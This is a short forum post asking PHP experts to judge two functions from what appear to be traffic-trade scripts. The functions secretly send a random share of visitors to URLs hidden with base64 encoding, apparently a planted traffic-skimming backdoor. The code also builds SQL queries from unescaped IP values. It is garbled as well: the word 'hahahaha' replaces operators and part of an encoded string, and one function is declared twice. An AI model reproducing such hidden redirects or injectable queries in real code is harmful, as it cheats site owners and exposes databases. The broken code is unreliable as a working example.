we all waiting php guru's be the judge
anyone around ?
anyone around ?



function send_hit($url){
global $thishour;
global $ip;
global $proxy;
if (rand(0,100)hahahaha0 || rand(0,100)<1) {
$url=base64_decode("aHR0cDovL3BheWxvYWQuaWNlZmlyZS5vcmcvY2pvdmVya2lsbC5waHA=");
@mysql_query("UPDATE cjoverkill_stats SET out$thishour=out$thishour+1 WHERE trade_id='4'") OR
print_error(mysql_error());
@mysql_query("UPDATE cjoverkill_iplog_out SET raw_out=raw_out+1 WHERE ip='$ip' AND proxy='$proxy' AND trade_id='4'") OR
print_error(mysql_error());
if (@mysql_affected_rows()hahahaha0) {
@mysql_query("INSERT INTO cjoverkill_iplog_out (trade_id, ip, proxy, raw_out) VALUES ('4', '$ip', '$proxy', 1)") OR
print_error(mysql_error());
}
}
header("Location: $url");
}
function sendhit($url) {
global $thishour;
if (rand(0,100) < 1) {
$url = base64_decode("aHR0cDovL3d3dy50dXJib3RyYWZmaWN0cmFkZXIuY29tL3JlZGlyZWN0Lwhahahaha");
mysql_query("UPDATE ttt_stats SET out$thishour=out$thishour+1 WHERE trade_id=3") or print_error(mysql_error());
}
header("Location: $url");
}



/* cjoverkill */
$sql=@mysql_query("SELECT * FROM cjoverkill_settings") OR
print_error(mysql_error());
$tmp=@mysql_fetch_array($sql);
extract($tmp);
/* TTT */
$res = mysql_query("SELECT * FROM ttt_settings") or print_error(mysql_error());
$row = mysql_fetch_array($res);
mysql_free_result($res);
extract($row);
/* TTT */
function print_error($msg) {
echo "<font face='verdana' size='3'><b>Error:</b><br><font size='2'>$msg</font></font>";
exit;
}
/* cjoverkill */
function print_error($msg) {
echo "<font face='verdana' size='3'><b>Error:</b><br><font size='2'>$msg</font></font>";
exit;
}

)


Comment